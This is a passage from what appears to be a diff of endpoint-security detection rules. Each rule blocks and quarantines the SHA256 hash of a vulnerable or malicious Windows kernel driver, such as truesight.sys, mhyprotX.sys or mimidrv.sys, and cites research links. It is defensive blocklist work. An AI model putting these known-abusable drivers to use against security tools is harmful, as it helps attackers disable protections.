+ "value": "dbcad271feda00f614ef9866886cde83e9fffac6e76694fd052790541bb7e993",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b38124d-1062-5cc5-93b9-1784dd20bc34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140690Z",
+ "creation_date": "2026-03-23T11:45:31.140692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140697Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e662bddd89c5886decdedb13b0037b88d5270bfeed1bafaa1e6c9199ab98fcc5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b3a1fdb-e6d9-5175-9f91-e26c0c22c850",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464062Z",
+ "creation_date": "2026-03-23T11:45:30.464066Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aaf04d89fd15bc61265e545f8e1da80e20f59f90058ed343c62ee24358e3af9e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b4716eb-45a1-5704-9a6f-380db688d587",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146656Z",
+ "creation_date": "2026-03-23T11:45:32.146658Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146664Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e42c8cb410a7ed653cfe62bbd8cf191f31a47337fe1ffcc35232d03f2da05ef",
+ "comment": "Vulnerable Kernel Driver (aka isodrivep64.sys) [https://www.loldrivers.io/drivers/0144dbef-1da8-406c-8e35-7afee57dc471/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b5146da-a38a-5c85-b236-6643f1c3066d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484389Z",
+ "creation_date": "2026-03-23T11:45:31.484393Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484404Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dec60f8994b1773fcdf3fe19aa88288eae060801f38be150e789d6fbbec594f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b67c2da-a992-5868-9157-d85c58840512",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977622Z",
+ "creation_date": "2026-03-23T11:45:29.977624Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977632Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cff3fc66d54279b755ceedf89268847dbb5139227739e4689f5d9271b1d7923b",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b8441e5-e033-5cb8-b8d8-1bc47883240c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493708Z",
+ "creation_date": "2026-03-23T11:45:31.493711Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5bf5496e3d659e3c2e2e307eed9950313aa786993b5ddda1c57ad63b845cc2f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b8e6f7d-929c-56bd-ac32-d072c299cb09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815624Z",
+ "creation_date": "2026-03-23T11:45:31.815626Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815632Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c90eaa11eeb28ab56835396f73ce0b6cc53b16763b6458cd9785c7611e1bc5e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b9814c4-ac15-5d6b-814b-ae9c1bf43a71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827748Z",
+ "creation_date": "2026-03-23T11:45:31.827752Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6e12d25d540bcdcacfdc5b002ec1c143bfbc27ac1b245ba4c4b02cf0aad68be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2b9aa810-44f3-5154-804a-2c95520bba88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816339Z",
+ "creation_date": "2026-03-23T11:45:30.816341Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1072beb3ff6b191b3df1a339e3a8c87a8dc5eae727f2b993ea51b448e837636a",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ba4de36-e541-5562-9938-f56fefe825aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480047Z",
+ "creation_date": "2026-03-23T11:45:31.480051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e9f8dba42f74f39e47db54d329e72eeedd4099ec19e07ed6118ea4226dcc89b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2baca094-5735-5f83-bf9e-37a9d250417f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481326Z",
+ "creation_date": "2026-03-23T11:45:31.481330Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "295b4bb1caf0ae8e2899d4a0d8993b89a8c8a49545c6189a7a159df1c53e35be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2bb28b0e-7192-5fd1-b368-945713324554",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479404Z",
+ "creation_date": "2026-03-23T11:45:30.479406Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479411Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9ae1d53a464bc9bb86782ab6c55e2da8804c80a361139a82a6c8eef30fddd7c",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2bba6706-e84e-5e31-89a4-cad3682dfe0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817142Z",
+ "creation_date": "2026-03-23T11:45:30.817144Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817150Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "478bcb750017cb6541f3dd0d08a47370f3c92eec998bc3825b5d8e08ee831b70",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2bbb4aa0-da50-567a-98d7-7dd04b24bf1a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487843Z",
+ "creation_date": "2026-03-23T11:45:31.487845Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd558e1672f27fe33be51a323270220d801faa7a5161325b3f209a57165c2276",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2bc26081-95be-5d44-a561-06ac2d24800a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825022Z",
+ "creation_date": "2026-03-23T11:45:31.825024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825030Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47b1d7407df6ae4e63d4a70c894fde455f8e93382ce2bb266a0b558e87c5215e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2bc518ec-b0db-5c71-9c61-ecc662ba8092",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818049Z",
+ "creation_date": "2026-03-23T11:45:30.818051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bac7e75745d0cb8819de738b73edded02a07111587c4531383dccd4562922b65",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2bd8df8d-38a9-5afc-9f94-c20ce89e8da2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150018Z",
+ "creation_date": "2026-03-23T11:45:31.150020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a05d43c56290c41bd2eb75c19d32da821a055aa05c3b5bca2af047bd7cf01fe5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2becde35-7ed3-52c6-b3bc-f1bb773110ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981076Z",
+ "creation_date": "2026-03-23T11:45:29.981078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981083Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b19a7207a55d752db1b366b1dea2fd2c7620a825a3f0dcffca10af76611118c",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2bf002f5-8d92-5942-83f1-e21ed0e1773c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622002Z",
+ "creation_date": "2026-03-23T11:45:29.622004Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622010Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ebc5906d7fd9c606dc6ef9b49f3e57b63af838f5807fcdcdd5ff47b5b05e39c",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2bf9e2cb-de54-54eb-ac80-a2457b55239d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455700Z",
+ "creation_date": "2026-03-23T11:45:30.455704Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455713Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8dcec67a1f4903981c3e0ab938784c2f241e041e26748e1c22059e0e507cfb37",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c03667b-6c4b-5e6f-9b6a-46a9f437d2d7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973535Z",
+ "creation_date": "2026-03-23T11:45:29.973537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "385485e643aa611e97ceae6590c6a8c47155886123dbb9de1e704d0d1624d039",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c07fd5f-b564-5da6-845d-e4dfb5461d6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478005Z",
+ "creation_date": "2026-03-23T11:45:31.478010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5075bbd95d7f849fceb89e8d8ee6e471f43f38f10e73ce0051c430860fd8bf82",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2c0e5f36-b170-519b-9d56-7547d9f9149a",
